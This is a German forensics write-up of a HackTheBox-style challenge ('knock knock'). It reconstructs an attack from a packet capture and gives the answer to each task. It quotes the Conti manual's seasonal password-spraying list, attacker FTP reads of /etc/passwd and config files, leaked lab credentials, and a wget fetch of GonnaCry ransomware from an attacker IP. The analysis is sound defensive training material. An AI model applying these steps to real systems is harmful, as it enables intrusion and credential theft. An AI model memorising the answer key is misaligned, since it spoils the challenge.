knock knock
 | Veröffentlicht | 2023-11-13 |
| Retired | 2023-11-30 | |
| Autor | CyberJunkie |
Szenario
Task 1
Frage: Auf welche Ports stieß der Angreifer während seiner Aufzählungsphase, in der er nach offenen Ports suchte?
Original: Which ports did the attacker find open during their enumeration phase?
Durch einen Export aller 80.472 TCP Verbindungen aus dem Capture.pcap in eine JSON Datei kann der Datensatz via Python Script gefiltert werden. Durch eine vorherige Sichtprüfung konnte ein Portscan identifiziert werden.
| |
Streams in einem Portscan haben 2 Pakete falls der Port geschlossen ist, beliebig viele falls offen, je nach Service. Daher kann ein Filter auf die Anzahl der Pakete in jedem Stream identifizieren welche Ports als offen an den Angreifer gemeldet wurden.
Antwort: 21,22,3306,6379,8086
Task 2
Frage: Um welche UTC-Zeit hat der Angreifer seinen Angriff gegen den Server gestartet?
Original: Whats the UTC time when attacker started their attack against the server?
Das erste, dem Angreifer zuzuordnende Paket von einer der ihm zugeordneten IP Adressen (3.109.209.43) ist im TCP Stream 12199 und hat den Zeitstempel 2023-03-21 10:42:23,708988
Antwort: 21/03/2023 10:42:23
Task 3
Frage: Was ist die MITRE Technique ID der Technik, die der Angreifer verwendet hat, um den initialen Zugriff zu erhalten?
Original: What’s the MITRE Technique ID of the technique attacker used to get initial access?
Im späteren Verlauf des Netzwerktraffics in Capture.pcap versucht der Angreifer sich via FTP einzuloggen. Dafür nutzt er eine kleine Liste an Passwörtern gegen eine kleine Liste von Nutzernamen. Die versuchten Passwörter stimmen hier mit der Technik zur Erstellung einer Passwort Liste aus dem 2021 geleakten Conti Manual überein.
It is also recommended to use a list of passwords based on the times of the
year and the current year. Given that passwords are changed once in three
months - you can take a "reserve" for the generation of the sheet.
For example, in August 2020 , we create a list with the following content
June2020
July2020
August20
August2020
Summer20
Summer2020
June2020!
July2020!
August20!
August2020!
Summer20!
Summer2020!
Antwort: T1110.003
Task 4
Frage: Welche gültigen Anmeldedaten wurden verwendet, um den initialen Zugriff zu erreichen?
Original: What are valid set of credentials used to get initial foothold?
Durch filtern der Daten in Wireshark nach ftp.response.arg contains "Login successful" können zwei erfolgreiche FTP Logins und die ihnen zugehörigen TCP Streams gefunden werden. Durch folgen der ersten TCP Verbindung 70.832 können die zugehörigen Benutzernamen und Passwort ausgelesen werden.
220 (vsFTPd 3.0.5)
USER tony.shephard
331 Please specify the password.
PASS Summer2023!
230 Login successful.
Antwort: tony.shephard:Summer2023!
Task 5
Frage: Welche bösartige IP-Adresse hat der Angreifer für den initialen Zugriff genutzt?
Original: What is the Malicious IP address utilized by the attacker for initial access?
Aus dem in Task 4 identifizierten Paket lässt sich auch die Angreifer IP auslesen.
----
- 208838
- 2023-03-21 10:50:20,870888
- 172.31.39.46
- 3.109.209.43
- FTP
- 89
- Response: 230 Login successful.
Antwort: 3.109.209.43
Task 6
Frage: Wie lautet der Name der Datei, die einige Konfigurationsdaten und Anmeldeinformationen enthielt?
Original: What is name of the file which contained some config data and credentials?
Im weiteren Verlauf des FTP Traffics öffnet der Angreifer verschiedene Dateien und liest deren Inhalt. Eine davon ist die gesuchte mit den zugehörigen Anmeldeinformationen.
----
- 209274
- 2023-03-21 10:52:03,447182
- 3.109.209.43
- 172.31.39.46
- FTP
- 80
- Request: RETR .backup
Antwort: .backup
Task 7
Frage: Auf welchem Port lief der kritische Dienst?
Original: Which port was the critical service running?
Durch die im Task 6 gefundene Übertragung der Konfigurationsdatei lässt sich in der dem Paket folgenden TCP Verbindung 77.849 diese auslesen
| |
Bei dieser Datei handelt es sich um eine Konfiguration für knockd, einem port-knock Server. Hier wird ein FTP-INTERNAL Dienst definiert, der Port ist im Command als Argument angegeben.
Antwort: 24456
Task 8
Frage: Wie lautet der Name der Technik, die verwendet wurde, um auf diesen kritischen Dienst zuzugreifen?
Original: Whats the name of technique used to get to that critical service?
Bei der von knockd implementierten Funktionalität handelt es sich um Port Knocking.
Antwort: Port Knocking
Task 9
Frage: Welche Ports waren erforderlich, um mit dem kritischen Dienst zu interagieren?
Original: Which ports were required to interact with to reach the critical service?
Für Task 7 wurde die knockd Konfigurationsdatei ausgelesen, dort werden die gesuchten Ports in dem FTP-INTERNAL Abschnit unter dem Punkt sequence aufgelistet.
Antwort: 29999,45087,50234
Task 10
Frage: Um welche UTC-Zeit endete die Interaktion mit den in der vorherigen Frage genannten Ports?
Original: Whats the UTC time when interaction with previous question ports ended?
Um diesen Zeitstempel zu finden musst die Interaktion mit den Ports im Dump gefunden werden.
| |
Anschließend kann das finale Paket dieser Interaktion ausgelesen werden.
----
- 210694
- 2023-03-21 10:58:50,288137
- 172.31.39.46
- 3.109.209.43
- TCP
- 54
- 45087 → 45018 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
Antwort: 21/03/2023 10:58:50
Task 11
Frage: Welche Gruppe von gültigen Anmeldeinformationen wurde für den kritischen Dienst verwendet?
Original: What are set of valid credentials for the critical service?
In der .backup Datei, bei der es sich um eine knockd Konfiguration handelt, waren auch Zugangsdaten hinterlegt. Der zweite FTP Zugriff auf den internen FTP Zugang mit den neuen Zugangsdaten kann, nach erfolgreichem Port Knocking, in TCP Stream 77.911 ausgelesen werden.
| |
Antwort: abdullah.yasin:XhlhGame_90HJLDASxfd&hoooad
Task 12
Frage: Um welche UTC-Zeit hat der Angreifer Zugriff auf den kritischen Server erhalten?
Original: At what UTC Time attacker got access to the critical server?
Durch die in Task 11 gefundene TCP Verbindung mit der Authetifizierung des Angreifers kann auch der Zeitpunkt auf den Server durch das 230 Login successful Paket bestimmt werden.
----
- 210799
- 2023-03-21 11:00:01,645644
- 172.31.39.46
- 3.109.209.43
- TCP
- 89
- 24456 → 38032 [PSH, ACK] Seq=55 Ack=56 Win=62720 Len=23 TSval=1292623075 TSecr=2679030032
0000 02 76 f4 07 ce 92 02 cd 7c 7e ed ae 08 00 45 00 .v......|~....E.
0010 00 4b ba 70 40 00 40 06 d8 56 ac 1f 27 2e 03 6d .K.p@[email protected]..'..m
0020 d1 2b 5f 88 94 90 85 cf 9a 8f 29 7d 1b 4a 80 18 .+_.......)}.J..
0030 01 ea a8 23 00 00 01 01 08 0a 4d 0b dc e3 9f ae ...#......M.....
0040 c1 10 32 33 30 20 4c 6f 67 69 6e 20 73 75 63 63 ..230 Login succ
0050 65 73 73 66 75 6c 2e 0d 0a essful...
Antwort: 21/03/2023 11:00:01
Task 13
Frage: Wie ist die AWS AccoundID und das Passwort für den Entwickler “Abdullah”?
Original: Whats the AWS AccountID and Password for the developer “Abdullah”?
Im Verlauf der FTP Kommunikation mit dem internen Server hat der Angreifer eine .archived.sql Datei gefunden und zu sich übertragen.
----
- 211112
- 2023-03-21 11:02:07,287519
- 3.109.209.43
- 172.31.39.46
- TCP
- 86
- Request: RETR .archived.sql
Die Übertragung der Datei lässt sich aus dem direkt folgenden Stream 77936 auslesen.
-- MySQL dump 10.13 Distrib 8.0.32, for Linux (x86_64)
[...]
CREATE TABLE `AWS_EC2_DEV` (
`NAME` varchar(40) DEFAULT NULL,
`AccountID` varchar(40) DEFAULT NULL,
`Password` varchar(60) NOT NULL
)
[...]
INSERT INTO `AWS_EC2_DEV` VALUES
('Alonzo','341624703104',''),
(NULL,NULL,'d;089gjbj]jhTVLXEROP.madsfg'),
('Abdullah','391629733297','yiobkod0986Y[adij@IKBDS');
[...]
Antwort: 391629733297:yiobkod0986Y[adij@IKBDS
Task 14
Frage: Was ist die Frist für die Einstellung von Entwicklern bei Forela?
Original: Whats the deadline for hiring developers for forela?
Im späteren Verlauf der Übertragung lädt der Angreifer die Done.docx Datei herunter. Hierbei handelt es sich um eine Word Datei, die sich aus dem TCP Stream 77.938 rekonstruieren lässt.
Antwort: 30/08/2023
Task 15
Frage: Wann war der CEO von Forela in Pakistan geplant?
Original: When did CEO of forela was scheduled to arrive in pakistan?
Der Angreifer lädt außerdem die reminder.txt Datei aus via TCP Stream 77.941 auf seinen Client.
I am so stupid and dump, i keep forgetting about Forela CEO Happy grunwald visiting Pakistan to start the buisness operations
here.I have so many tasks to complete so there are no problems once the Forela Office opens here in Lahore. I am writing this
note and placing it on all my remote servers where i login almost daily, just so i dont make a fool of myself and get the
urgent tasks done.
He is to arrive in my city on 8 march 2023 :))
i am finally so happy that we are getting a physical office opening here.
Antwort: 08/03/2023
Task 16
Frage: Der Angreifer konnte Directory Traversal durchführen und aus dem Chroot-Jail entkommen. Dies ermöglichte es dem Angreifer, sich im Dateisystem zu bewegen, so wie es ein normaler Benutzer tun würde. Wie lautet der Benutzername eines Kontos, das nicht “root” ist und bei dem “/bin/bash” als Standard-Shell festgelegt ist?
Original: The attacker was able to perform directory traversel and escape the chroot jail.This caused attacker to roam around the filesystem just like a normal user would. Whats the username of an account other than root having /bin/bash set as default shell?
Die gesuchte Information lässt sich auf Linux-Systemen aus /etc/passwd auslesen, die der Angreifer in Paket 211.271 angefordert hat.
0000 02 cd 7c 7e ed ae 02 76 f4 07 ce 92 08 00 45 10 ..|~...v......E.
0010 00 46 f4 4d 40 00 3f 06 9f 6e 03 6d d1 2b ac 1f .F.M@.?..n.m.+..
0020 27 2e 94 90 5f 88 29 7d 1c cc 85 cf a0 3e 80 18 '..._.)}.....>..
0030 40 00 a9 9f 00 00 01 01 08 0a 9f b1 c2 4f 4d 0e @............OM.
0040 dd ef 52 45 54 52 20 2f 65 74 63 2f 70 61 73 73 ..RETR /etc/pass
0050 77 64 0d 0a wd..
root:x:0:0:root:/root:/bin/bash
[...]
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
[...]
cyberjunkie:x:1003:1003:,,,:/home/cyberjunkie:/bin/bash
Außerdem versuchte der Angreifer im Folgenden noch /etc/shadow herunterzuladen, was mangels Berechtigungen allerdings fehlschlug.
Antwort: cyberjunkie
Task 17
Frage: Was ist der vollständige Pfad der Datei, die zum SSH-Zugriff des Angreifers auf den Server führte?
Original: Whats the full path of the file which lead to ssh access of the server by attacker?
Der Angreifer öffnet mit TCP Stream 77.981 die Datei .reminder mit dem Inhalt
A reminder to clean up the github repo. Some sensitive data could have been leaked from there
Der Pfad zu dieser Datei kann durch vorherigen Befehle via FTP und deren Antworten aus drei TCP Verbindungen (77.975, 77.977, 77.979) zusammengesetzt werden.
drwxr-xr-x 19 0 0 4096 Mar 20 14:35 .
drwxr-xr-x 19 0 0 4096 Mar 20 14:35 ..
lrwxrwxrwx 1 0 0 7 Feb 08 02:09 bin -> usr/bin
drwxr-xr-x 4 0 0 4096 Mar 17 12:11 boot
drwxr-xr-x 16 0 0 3220 Mar 20 14:35 dev
drwxr-xr-x 104 0 0 4096 Mar 21 10:56 etc
drwxr-xr-x 6 0 0 4096 Mar 16 10:57 home
lrwxrwxrwx 1 0 0 7 Feb 08 02:09 lib -> usr/lib
lrwxrwxrwx 1 0 0 9 Feb 08 02:09 lib32 -> usr/lib32
lrwxrwxrwx 1 0 0 9 Feb 08 02:09 lib64 -> usr/lib64
lrwxrwxrwx 1 0 0 10 Feb 08 02:09 libx32 -> usr/libx32
drwx------ 2 0 0 16384 Feb 08 02:11 lost+found
drwxr-xr-x 2 0 0 4096 Feb 08 02:09 media
drwxr-xr-x 2 0 0 4096 Feb 08 02:09 mnt
drwxr-xr-x 3 0 0 4096 Mar 17 12:42 opt
dr-xr-xr-x 185 0 0 0 Mar 20 14:35 proc
drwx------ 6 0 0 4096 Mar 20 14:38 root
drwxr-xr-x 31 0 0 1000 Mar 21 09:45 run
lrwxrwxrwx 1 0 0 8 Feb 08 02:09 sbin -> usr/sbin
drwxr-xr-x 8 0 0 4096 Feb 08 02:13 snap
drwxr-xr-x 3 0 0 4096 Mar 15 12:38 srv
dr-xr-xr-x 13 0 0 0 Mar 20 14:35 sys
drwxrwxrwt 12 0 0 4096 Mar 21 11:02 tmp
drwxr-xr-x 14 0 0 4096 Feb 08 02:09 usr
drwxr-xr-x 13 0 0 4096 Feb 08 02:10 var
# cd opt
# ls -la
drwxr-xr-x 3 0 0 4096 Mar 17 12:42 .
drwxr-xr-x 19 0 0 4096 Mar 20 14:35 ..
drwxr-xr-x 2 0 0 4096 Mar 17 12:46 reminders
# cd reminders
# ls -la
drwxr-xr-x 2 0 0 4096 Mar 17 12:46 .
drwxr-xr-x 3 0 0 4096 Mar 17 12:42 ..
-rw-r--r-- 1 0 0 94 Mar 17 12:46 .reminder
Antwort: /opt/reminders/.reminder
Task 18
Frage: Was ist das SSH-Passwort, das der Angreifer verwendet hat, um auf den Server zuzugreifen und volle Kontrolle zu erlangen?
Original: Whats the SSH password which attacker used to access the server and get full access?
Mit dem Firmennamen (Forela) und dem Namen des Entwicklers (cyberjunkie) kann das forela-dev Repository bei GitHub identifiziert werden, indem internal-dev.yaml mit SSH Zugangsinformationen liegt. Nach Klonen des Repository kann mit git log die History der Commits durchsucht werden. Dabei fällt der Commit ab04702b3269f016def0521a734380fb12596994 durch seinen Kommentar auf.
Updated the script to be more secure. Earlier configuration was insecure
Die Änderungen dieses Commits können mit git show ab04702b3269f016def0521a734380fb12596994 angezeigt werden.
commit ab04702b3269f016def0521a734380fb12596994
Author: CyberJunnkie <[email protected]>
Date: Tue Mar 21 15:35:11 2023 +0500
Update internal-dev.yaml
Updated the script to be more secure. Earlier configuration was insecure
diff --git a/internal-dev.yaml b/internal-dev.yaml
index 4cf911e..2d00664 100644
--- a/internal-dev.yaml
+++ b/internal-dev.yaml
@@ -4,12 +4,18 @@
become: yes
tasks:
+ - name: Download SSH key from URL
+ get_url:
+ url: "http://dev.forela.co.uk/internal/secrets/cyberjunkie-internal.pem"
+ dest: "/tmp/cyberjunkie.pem"
+ mode: "0600"
- name: Log in to remote server via SSH
become_user: root
become_method: sudo
vars:
ssh_user: cyberjunkie
- ssh_password: YHUIhnollouhdnoamjndlyvbl398782bapd
+ ssh_key_file: /path/to/local/ssh/key
[...]
Antwort: YHUIhnollouhdnoamjndlyvbl398782bapd
Task 19
Frage: Was ist die vollständige URL, von der der Angreifer das Ransomware-Programm heruntergeladen hat?
Original: Whats the full url from where attacker downloaded ransomware?
Nach dem FTP Traffic verbindet sich der Angreifer via SSH. Die Aktionen die er dort durchführt können aus dem Netzwerkverkehr nicht reproduziert werden. Allerdings wird im späteren Verlauf eine weitere Verbindung (78.236) zu einer weiteren IP (13.233.179.35) des Angreifers aufgebaut.
----
- 213543
- 2023-03-21 11:42:34,411936
- 172.31.39.46
- 13.233.179.35
- HTTP
- 242
- GET /PKCampaign/Targets/Forela/Ransomware2_server.zip HTTP/1.1
Antwort: http://13.233.179.35/PKCampaign/Targets/Forela/Ransomware2_Server.zip
Task 20
Frage: Was ist der Name und die Version des Tools/Programms, das der Angreifer verwendet hat, um die Ransomware herunterzuladen?
Original: Whats the tool/util name and version which attacker used to download ransomware?
Der HTTP Header des GET Requests aus Task 19 enthält einen User Agent. Dieser identifiziert das Tool mit dem der Angreifer die Ransomware heruntergeladen hat.
0000 47 45 54 20 2f 50 4b 43 61 6d 70 61 69 67 6e 2f GET /PKCampaign/
0010 54 61 72 67 65 74 73 2f 46 6f 72 65 6c 61 2f 52 Targets/Forela/R
0020 61 6e 73 6f 6d 77 61 72 65 32 5f 73 65 72 76 65 ansomware2_serve
0030 72 2e 7a 69 70 20 48 54 54 50 2f 31 2e 31 0d 0a r.zip HTTP/1.1..
0040 48 6f 73 74 3a 20 31 33 2e 32 33 33 2e 31 37 39 Host: 13.233.179
0050 2e 33 35 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a .35..User-Agent:
0060 20 57 67 65 74 2f 31 2e 32 31 2e 32 0d 0a 41 63 Wget/1.21.2..Ac
0070 63 65 70 74 3a 20 2a 2f 2a 0d 0a 41 63 63 65 70 cept: */*..Accep
0080 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 69 64 65 6e t-Encoding: iden
0090 74 69 74 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e tity..Connection
00a0 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 0d 0a : Keep-Alive....
Antwort: Wget/1.21.2
Task 21
Frage: Wie lautet der Name der Ransomware?
Original: Whats the ransomware name?
In der TCP Verbindung aus Task 20 (78.236) sind einige Dateipfade zu erkennen. Diese geben den Namen der Ransomware an mehreren Stellen preis.
----
- 217911
- 2023-03-21 11:42:34,639306
- 13.233.179.35
- 172.31.39.46
- TCP
- 8754
0860 00 52 61 6e 73 6f 6d 77 61 72 65 32 5f 73 65 72 .Ransomware2_ser
0870 76 65 72 2f 73 72 63 2f 47 6f 6e 6e 61 43 72 79 ver/src/GonnaCry
0880 2f 55 54 09 00 03 b3 96 19 64 f5 97 19 64 75 78 /UT......d...dux
0890 0b 00 01 04 00 00 00 00 04 00 00 00 00 50 4b 03 .............PK.
08a0 04 14 00 00 00 08 00 8a 5c 75 56 3e aa 7e 59 23 ........\uV>.~Y#
08b0 01 00 00 ab 02 00 00 2e 00 1c 00 52 61 6e 73 6f ...........Ranso
08c0 6d 77 61 72 65 32 5f 73 65 72 76 65 72 2f 73 72 mware2_server/sr
08d0 63 2f 47 6f 6e 6e 61 43 72 79 2f 65 6e 76 69 72 c/GonnaCry/envir
08e0 6f 6e 6d 65 6e 74 2e 70 79 55 54 09 00 03 b3 96 onment.pyUT.....
08f0 19 64 b3 96 19 64 75 78 0b 00 01 04 00 00 00 00 .d...dux........
[...]
0a40 00 00 28 00 1c 00 52 61 6e 73 6f 6d 77 61 72 65 ..(...Ransomware
0a50 32 5f 73 65 72 76 65 72 2f 73 72 63 2f 47 6f 6e 2_server/src/Gon
0a60 6e 61 43 72 79 2f 63 6c 65 61 6e 2e 73 68 55 54 naCry/clean.shUT
0a70 09 00 03 b3 96 19 64 b3 96 19 64 75 78 0b 00 01 ......d...dux...
0a80 04 00 00 00 00 04 00 00 00 00 53 56 d4 4f ca cc ..........SV.O..
0a90 d3 4f 4a 2c ce e0 2a ca 55 d0 d2 2b a8 4c 06 31 .OJ,..*.U..+.L.1
0aa0 74 8b d2 14 e2 e3 81 9c c4 e4 8c d4 f8 78 2e 00 t............x..
0ab0 50 4b 03 04 14 00 00 00 08 00 8a 5c 75 56 e9 ae PK.........\uV..
0ac0 24 3f 11 02 00 00 06 05 00 00 2c 00 1c 00 52 61 $?........,...Ra
0ad0 6e 73 6f 6d 77 61 72 65 32 5f 73 65 72 76 65 72 nsomware2_server
0ae0 2f 73 72 63 2f 47 6f 6e 6e 61 43 72 79 2f 73 79 /src/GonnaCry/sy
0af0 6d 6d 65 74 72 69 63 2e 70 79 55 54 09 00 03 b3 mmetric.pyUT....
[...]
0d40 00 2a 00 1c 00 52 61 6e 73 6f 6d 77 61 72 65 32 .*...Ransomware2
0d50 5f 73 65 72 76 65 72 2f 73 72 63 2f 47 6f 6e 6e _server/src/Gonn
0d60 61 43 72 79 2f 64 72 6f 70 70 65 72 2e 70 79 55 aCry/dropper.pyU
0d70 54 09 00 03 b3 96 19 64 b3 96 19 64 75 78 0b 00 T......d...dux..
[...]
Die genutzte Ransomware konnte daher durch GitHub identifziert werden.
Antwort: GonnaCry